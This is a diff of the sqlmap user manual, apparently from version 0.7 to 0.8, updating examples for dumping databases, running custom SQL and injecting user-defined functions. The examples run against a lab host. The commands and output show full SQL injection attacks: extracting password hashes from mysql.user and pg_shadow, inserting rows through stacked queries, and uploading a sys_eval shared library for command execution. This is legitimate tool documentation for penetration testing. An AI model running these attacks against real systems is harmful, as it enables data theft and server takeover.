+$ cat ./output/172.16.213.131/dump/public/users.csv 
+id,name,surname
 "1","luther","blissett"
 "2","fluffy","bunny"
 "3","wu","ming"
-"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header"
+"4","sqlmap/0.8 (http://sqlmap.sourceforge.net)","user agent header"
 "5","","nameisnull"
 
      
 
      
 
      
 
-
      You can also provide the --start and/or the --stop
-options to limit the dump to a range of entries.
      
+
      You can also provide the --start and/or the --stop
+options to limit the dump to a range of entries, while those entries can be further
+limited to a range of character positions provided with --first 
+and/or the --last options:
      
 
      
 
        
-
      • --start specifies the first entry to enumerate
        • 
-
      • --stop specifies the last entry to enumerate
        • 
+
      • --start specifies the first entry to enumerate.
        • 
+
      • --stop specifies the last entry to enumerate.
        • 
 
      
 
      
 
@@ -3401,51 +3695,51 @@ options to limit the dump to a range of entries.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump \
-  -T users -D test --start 2 --stop 4 -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump \
+  -T users -D testdb --start 2 --stop 4 -v 0
 
-Database: test
+Database: testdb
 Table: users
 [3 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 2  | fluffy                                       | bunny             |
-| 3  | wu                                           | ming              |
-| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
-+----+----------------------------------------------+-------------------+
++----+--------------------------------------------+-------------------+
+| id | name                                       | surname           |
++----+--------------------------------------------+-------------------+
+| 2  | fluffy                                     | bunny             |
+| 3  | wu                                         | ming              |
+| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
++----+--------------------------------------------+-------------------+
 
      
 
      
 
      
 
-
      As you can see, sqlmap is very flexible: you can leave it automatically
-enumerate the whole database table up to a single column of a specific
-table entry.
      
+
      As you can see, sqlmap is very flexible. You can leave it to automatically
+enumerate the whole database table up to a range of characters of a single
+column of a specific table entry.
      
 
 
 
      Dump all databases tables entries
      
 
-
      Options: --dump-all and --exclude-sysdbs
      
+
      Options: --dump-all and --exclude-sysdbs
      
 
 
      It is possible to dump all databases tables entries at once.
      
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
 
-Database: test
+Database: testdb
 Table: users
 [5 entries]
-+----+----------------------------------------------+-------------------+
-| id | name                                         | surname           |
-+----+----------------------------------------------+-------------------+
-| 1  | luther                                       | blissett          |
-| 2  | fluffy                                       | bunny             |
-| 3  | wu                                           | ming              |
-| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
-| 5  | NULL                                         | nameisnull        |
-+----+----------------------------------------------+-------------------+
++----+--------------------------------------------+-------------------+
+| id | name                                       | surname           |
++----+--------------------------------------------+-------------------+
+| 1  | luther                                     | blissett          |
+| 2  | fluffy                                     | bunny             |
+| 3  | wu                                         | ming              |
+| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
+| 5  | NULL                                       | nameisnull        |
++----+--------------------------------------------+-------------------+
 
 Database: information_schema
 Table: CHARACTER_SETS
@@ -3496,15 +3790,15 @@ Table: CHARACTER_SETS
 
      
 
      
 
-
      You can also provide the --exclude-sysdbs option to exclude all
-system databases so that sqlmap will only dump entries of users' databases
+
      You can also provide the --exclude-sysdbs option to exclude all
+system databases. In that case sqlmap will only dump entries of users' databases
 tables.
      
 
 
      Example on a Microsoft SQL Server 2000 Service Pack 0 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --dump-all \
   --exclude-sysdbs -v 0
 
 Database: master
@@ -3533,7 +3827,7 @@ Table: users
 +----+----------------------------------------------+-------------------+
 | id | name                                         | surname           |
 +----+----------------------------------------------+-------------------+
-| 4  | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header |
+| 4  | sqlmap/0.8 (http://sqlmap.sourceforge.net)   | user agent header |
 | 2  | fluffy                                       | bunny             |
 | 1  | luther                                       | blisset           |
 | 3  | wu                                           | ming              |
@@ -3550,65 +3844,63 @@ considered a system database because some database administrators use it
 as a users' database.
      
 
 
-
      Run your own SQL statement
      
+
      Execute custom SQL statement
      
 
-
      Options: --sql-query and --sql-shell
      
+
      Options: --sql-query and --sql-shell
      
 
-
      The SQL query and the SQL shell features makes the user able to run
-custom SQL statement on the web application's back-end database management.
-sqlmap automatically recognize the type of SQL statement provided and
-choose which SQL injection technique to use to execute it: if it is a
-SELECT statement it will retrieve its output through the blind SQL
-injection or UNION query SQL injection technique depending on the user's
-options, otherwise it will execute the query through the stacked query
-SQL injection technique if the web application supports multiple
-statements on the back-end database management system.
      
+
      The SQL query and the SQL shell features makes the user able to execute
+custom SQL statements on the web application's back-end database
+management.
+sqlmap automatically dissects the provided statement, determines which
+technique to use to inject it and how to pack the SQL payload accordingly.
      
+
      If it is a SELECT statement, sqlmap will retrieve its output
+through the blind SQL injection or UNION query SQL injection technique
+depending on the user's options. Otherwise it will execute the query
+through the stacked query SQL injection technique if the web application
+supports multiple statements on the back-end database management system.
      
 
 
      Examples on a Microsoft SQL Server 2000 Service Pack 0 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
   "SELECT 'foo'" -v 1
 
 [...]
 [hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
-[hh:mm:14] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
-(CHAR(32)))
 [hh:mm:14] [INFO] retrieved: foo
-[hh:mm:14] [INFO] performed 27 queries in 0 seconds
 SELECT 'foo':    'foo'
 
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
-  "SELECT 'foo', 'bar'" -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
+  "SELECT 'foo', 'bar'" -v 2
 
 [...]
 [hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
 [hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into 
 distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
+[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), 
 (CHAR(32)))
 [hh:mm:50] [INFO] retrieved: foo
-[hh:mm:50] [INFO] performed 27 queries in 0 seconds
-[hh:mm:50] [INFO] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 
+[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
+[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), 
 (CHAR(32)))
 [hh:mm:50] [INFO] retrieved: bar
-[hh:mm:50] [INFO] performed 27 queries in 0 seconds
+[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
 SELECT 'foo', 'bar':    'foo, bar'
 
      
 
      
 
      
 
-
      As you can see from this last example, sqlmap splits the query in two
-different SELECT statement to be able to retrieve the output even
-when using the blind SQL injection technique.
-Otherwise in UNION query SQL injection technique it only performs a single
+
      As you can see from the last example, sqlmap splits provided query into two
+different SELECT statements for it to be able to retrieve the 
+output even in case when using the blind SQL injection technique.
+Otherwise, in UNION query SQL injection technique it only performs a single
 HTTP request to get the user's query output:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql-query \
-  "SELECT 'foo', 'bar'" -v 1 --union-use
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" --sql-query \
+  "SELECT 'foo', 'bar'" -v 2 --union-use
 
 [...]
 [hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
@@ -3618,12 +3910,12 @@ technique
 [hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
 vulnerability
-[hh:mm:03] [INFO] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
+[hh:mm:03] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
 CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
 +(CHAR(105)+CHAR(65)+CHAR(119)+CHAR(105)+CHAR(108)+CHAR(108))+ISNULL(CAST((CHAR(98)+CHAR(97)+
 CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(66)+CHAR(78)+CHAR(104)+CHAR(75)+CHAR(114)+
 CHAR(116)), NULL-- AND 8373=8373
-[hh:mm:03] [INFO] performed 3 queries in 0 seconds
+[hh:mm:03] [DEBUG] performed 3 queries in 0 seconds
 SELECT 'foo', 'bar' [1]:
 [*] foo, bar
 
      
@@ -3631,17 +3923,17 @@ SELECT 'foo', 'bar' [1]:
 
      
 
 
      If your SELECT statement contains a FROM clause, sqlmap
-asks the user if such statement can return multiple entries and in such
+asks the user if such statement can return multiple entries. In that
 case the tool knows how to unpack the query correctly to retrieve its
-whole output entry per entry when going through blind SQL injection
-technique. Through UNION query SQL injection it retrieved the whole output
-in a single response.
      
+whole output, entry per entry, when going through blind SQL injection
+technique. In provided example, UNION query SQL injection it retrieved 
+the whole output in a single response.
      
 
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-query \
   "SELECT usename FROM pg_user" -v 0
 
 [hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
@@ -3658,20 +3950,20 @@ SELECT usename FROM pg_user [2]:
 
      
 
      
 
-
      As you can see from the last example, sqlmap counted the number of entries
-for your query and asks how many entries you want to dump.
-Otherwise if you specify also the LIMIT, or similar, clause
-sqlmap will not ask anything, it just unpacks the query and return its
-output entry per entry when going through blind SQL injection technique.
-Through UNION query SQL injection it retrieved the whole output in a
-single response.
      
+
      As you can see from the last example, sqlmap counts the number of entries
+for a given query and asks for number of entries to dump.
+Otherwise, if the LIMIT is also specified, or similar clause,
+sqlmap will not ask for anything. It will just unpack the query and return its
+output, entry per entry, when going through blind SQL injection technique.
+In a given example, sqlmap used UNION query SQL injection to retrieve the 
+whole output in a single response.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
-  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-query \
+  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 2
 
 [...]
 back-end DBMS:  MySQL >= 5.0.0
@@ -3680,30 +3972,30 @@ back-end DBMS:  MySQL >= 5.0.0
 mysql.user LIMIT 1, 3'
 [hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
 into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
 mysql.user LIMIT 1, 1
 [hh:mm:22] [INFO] retrieved: localhost
-[hh:mm:22] [INFO] performed 69 queries in 0 seconds
-[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:22] [DEBUG] performed 69 queries in 0 seconds
+[hh:mm:22] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
 mysql.user LIMIT 1, 1
 [hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:24] [INFO] performed 293 queries in 2 seconds
-[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:24] [DEBUG] performed 293 queries in 2 seconds
+[hh:mm:24] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
 mysql.user LIMIT 2, 1
 [hh:mm:24] [INFO] retrieved: localhost
-[hh:mm:25] [INFO] performed 69 queries in 0 seconds
-[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:25] [DEBUG] performed 69 queries in 0 seconds
+[hh:mm:25] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
 mysql.user LIMIT 2, 1
 [hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
-[hh:mm:27] [INFO] performed 293 queries in 2 seconds
-[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:27] [DEBUG] performed 293 queries in 2 seconds
+[hh:mm:27] [DEBUG] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
 mysql.user LIMIT 3, 1
 [hh:mm:27] [INFO] retrieved: localhost
-[hh:mm:28] [INFO] performed 69 queries in 0 seconds
-[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
+[hh:mm:28] [DEBUG] performed 69 queries in 0 seconds
+[hh:mm:28] [DEBUG] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
 FROM mysql.user LIMIT 3, 1
 [hh:mm:28] [INFO] retrieved: 
-[hh:mm:28] [INFO] performed 6 queries in 0 seconds
+[hh:mm:28] [DEBUG] performed 6 queries in 0 seconds
 SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
 [*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
 [*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
@@ -3712,16 +4004,16 @@ SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
 
      
 
      
 
-
      The SQL shell option gives you access to run your own SQL statement
-interactively, like a SQL console logged to the back-end database
+
      The SQL shell option gives you an access to run your own SQL statement
+interactively, like a SQL console connected to the back-end database
 management system.
-This feature has TAB completion and history support.
      
+Note that this feature provides TAB completion and history support.
      
 
 
      Example of history support on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
 
 sql> SELECT 'foo'
 SELECT 'foo':    'foo'
@@ -3733,7 +4025,7 @@ SELECT version():    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc
 
 sql> exit
 
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 0
 
 sql> [UP arrow key shows 'exit', then DOWN arrow key clean the shell]
 sql> SELECT usename, passwd FROM pg_shadow ORDER BY usename
@@ -3755,7 +4047,7 @@ SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
 
 sql> [TAB TAB]
  LIMIT 
@@ -3791,14 +4083,14 @@ sql> SELECT
 
 
      As you can see the TAB functionality shows the queries defined for the
 back-end database management system in sqlmap XML queries file, but you
-can run whatever SELECT statement that you want.
      
+can run whatever SELECT statement you want.
      
 
 
      Example of asterisk expansion on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell \
-  -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --sql-shell \
+  -v 2
 
 [...]
 [hh:mm:40] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
@@ -3808,32 +4100,32 @@ sql> SELECT * FROM test.users
 column names itself.
 [hh:mm:48] [INFO] fetching columns for table 'users' on database 'test'
 [hh:mm:48] [INFO] fetching number of columns for table 'users' on database 'test'
-[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
+[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(COUNT(column_name) AS CHAR(10000)), CHAR(32)) 
 FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
 table_schema=CHAR(116,101,115,116)
 [hh:mm:48] [INFO] retrieved: 3
-[hh:mm:48] [INFO] performed 13 queries in 0 seconds
-[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:48] [DEBUG] performed 13 queries in 0 seconds
+[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
 information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
 table_schema=CHAR(116,101,115,116) LIMIT 0, 1
 [hh:mm:48] [INFO] retrieved: id
-[hh:mm:48] [INFO] performed 20 queries in 0 seconds
-[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:48] [DEBUG] performed 20 queries in 0 seconds
+[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
 information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
 table_schema=CHAR(116,101,115,116) LIMIT 1, 1
 [hh:mm:48] [INFO] retrieved: name
-[hh:mm:48] [INFO] performed 34 queries in 0 seconds
-[hh:mm:48] [INFO] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:48] [DEBUG] performed 34 queries in 0 seconds
+[hh:mm:48] [DEBUG] query: SELECT IFNULL(CAST(column_name AS CHAR(10000)), CHAR(32)) FROM 
 information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND 
 table_schema=CHAR(116,101,115,116) LIMIT 2, 1
 [hh:mm:48] [INFO] retrieved: surname
-[hh:mm:48] [INFO] performed 55 queries in 0 seconds
+[hh:mm:48] [DEBUG] performed 55 queries in 0 seconds
 [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
 [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
-[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:04] [DEBUG] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM 
 test.users
 [hh:mm:04] [INFO] retrieved: 5
-[hh:mm:04] [INFO] performed 13 queries in 0 seconds
+[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
 [hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many 
 entries 
 do you want to retrieve?
@@ -3842,42 +4134,42 @@ do you want to retrieve?
 [q] Quit
 Choice: 3
 [hh:mm:09] [INFO] sqlmap is now going to retrieve the first 3 query output entries
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
 ORDER BY id ASC LIMIT 0, 1
 [hh:mm:09] [INFO] retrieved: 1
-[hh:mm:09] [INFO] performed 13 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
+[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
 ORDER BY id ASC LIMIT 0, 1
 [hh:mm:09] [INFO] retrieved: luther
-[hh:mm:09] [INFO] performed 48 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
 test.users ORDER BY id ASC LIMIT 0, 1
 [hh:mm:09] [INFO] retrieved: blissett
-[hh:mm:09] [INFO] performed 62 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
+[hh:mm:09] [DEBUG] performed 62 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
 ORDER BY id ASC LIMIT 1, 1
 [hh:mm:09] [INFO] retrieved: 2
-[hh:mm:09] [INFO] performed 13 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
+[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
 ORDER BY id ASC LIMIT 1, 1
 [hh:mm:09] [INFO] retrieved: fluffy
-[hh:mm:09] [INFO] performed 48 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:09] [DEBUG] performed 48 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
 test.users ORDER BY id ASC LIMIT 1, 1
 [hh:mm:09] [INFO] retrieved: bunny
-[hh:mm:09] [INFO] performed 41 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
+[hh:mm:09] [DEBUG] performed 41 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
 ORDER BY id ASC LIMIT 2, 1
 [hh:mm:09] [INFO] retrieved: 3
-[hh:mm:09] [INFO] performed 13 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
+[hh:mm:09] [DEBUG] performed 13 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users 
 ORDER BY id ASC LIMIT 2, 1
 [hh:mm:09] [INFO] retrieved: wu
-[hh:mm:09] [INFO] performed 20 queries in 0 seconds
-[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
+[hh:mm:09] [DEBUG] performed 20 queries in 0 seconds
+[hh:mm:09] [DEBUG] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM 
 test.users ORDER BY id ASC LIMIT 2, 1
 [hh:mm:09] [INFO] retrieved: ming
-[hh:mm:10] [INFO] performed 34 queries in 0 seconds
+[hh:mm:10] [DEBUG] performed 34 queries in 0 seconds
 SELECT * FROM test.users [3]:
 [*] 1, luther, blissett
 [*] 2, fluffy, bunny
@@ -3886,9 +4178,9 @@ SELECT * FROM test.users [3]:
 
      
 
      
 
-
      As you can see in this last example, if the SELECT statement has
-an asterisk instead of the column(s) name, sqlmap first retrieves the
-column names of the table then asks if the query can return multiple
+
      As you can see from the example, if the SELECT statement has
+an asterisk instead of the column(s) name, sqlmap first retrieves all
+column names of the current table, asks if the query can return multiple
 entries and goes on.
      
 
 
      Example of SQL statement other than SELECT on a PostgreSQL
@@ -3896,73 +4188,119 @@ entries and goes on.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --sql-shell -v 1
 
 [...]
 back-end DBMS: PostgreSQL
 
 [10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER
 sql> SELECT COUNT(name) FROM users
-[10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
-[10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
-[10:11:59] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) 
-FROM users
-[10:11:59] [INFO] retrieved: 4
-[10:11:59] [INFO] performed 13 queries in 0 seconds
+[hh:mm:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
+[hh:mm:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
+[hh:mm:59] [INFO] retrieved: 4
 SELECT COUNT(name) FROM users:    '4'
 
 sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell');
-[10:12:35] [INFO] testing stacked queries support on parameter 'id'
-[10:12:40] [INFO] the web application supports stacked queries on parameter 'id'
-[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users 
+[hh:mm:35] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:40] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users 
 (id, name, surname) VALUES (5, 'from', 'sql shell');'
-[10:12:40] [INFO] done
+[hh:mm:40] [INFO] done
 sql> SELECT COUNT(name) FROM users
-[10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
-[10:12:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
-[10:12:53] [INFO] query: SELECT COALESCE(CAST(COUNT(name) AS CHARACTER(10000)), CHR(32)) 
-FROM users
-[10:12:53] [INFO] retrieved: 5
-[10:12:54] [INFO] performed 20 queries in 0 seconds
+[hh:mm:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users'
+[hh:mm:51] [INPUT] can the SQL query provided return multiple entries? [Y/n] n
+[hh:mm:53] [INFO] retrieved: 5
 SELECT COUNT(name) FROM users:    '5'
 
      
 
      
 
      
 
-
      As you can see from this last example, when the user provides a SQL
-statement other than SELECT, sqlmap recognizes it, tests if the
-web application supports stacked queries and in case it does, it executes
-the provided SQL statement in a multiple statement.
      
+
      As you can see from the example, when the user provides a SQL statement 
+other than SELECT, sqlmap recognizes it, tests if the web 
+application supports stacked queries and in case it does, it executes
+the provided SQL statement in a multiple statement mode.
      
 
 
      Beware that some web application technologies do not support stacked
-queries on specific database management systems. For instance, PHP does not
-support stacked queries when the back-end DBMS is MySQL, but it does
+queries on specific database management systems. For instance, PHP does
+not support stacked queries when the back-end DBMS is MySQL, but it does
 support when the back-end DBMS is PostgreSQL.
      
 
 
-
      5.8 File system access
+
      5.8 User-defined function injection
 
      
 
-
      Read a file from the back-end DBMS file system
      
+
      Inject custom user-defined functions (UDF)
      
 
-
      Option: --read-file
      
+
      Options: --udf-inject and --shared-lib
      
+
+
      You can inject your own user-defined functions (UDFs) by compiling a
+MySQL or PostgreSQL shared library, DLL for Windows and shared object for
+Linux/Unix, then provide sqlmap with the path where the shared library
+is stored locally on your machine. sqlmap will then ask you some
+questions, upload the shared library on the database server file system,
+create the user-defined function(s) from it and, depending on your
+options, execute them. When you are finished using the injected UDFs,
+sqlmap can also remove them from the database for you.
      
+
+
      Example on a PostgreSQL 8.4:
      
+
      
+
      
+
      +$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
+
+[...]
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: PostgreSQL
+
+which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
+how many user-defined functions do you want to create from the shared library? 1
+what is the name of the UDF number 1? sys_eval
+how many input parameters takes UDF 'sys_eval'? (default: 1) 
+what is the data-type of input parameter number 1? (default: text) 
+what is the data-type of the return value? (default: text) 
+do you want to call your injected user-defined functions now? [Y/n/q] y
+which UDF do you want to call?
+[1] sys_eval
+[q] Quit
+> 1
+what is the value of the parameter number 1 (data-type: text)? echo test
+do you want to retrieve the return value of the UDF? [Y/n] 
+return value:    'test'
+
+do you want to call this or another injected UDF? [Y/n] n
+do you want to remove UDF 'sys_eval'? [Y/n] 
+[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only 
+be deleted manually
+
      
+
      
+
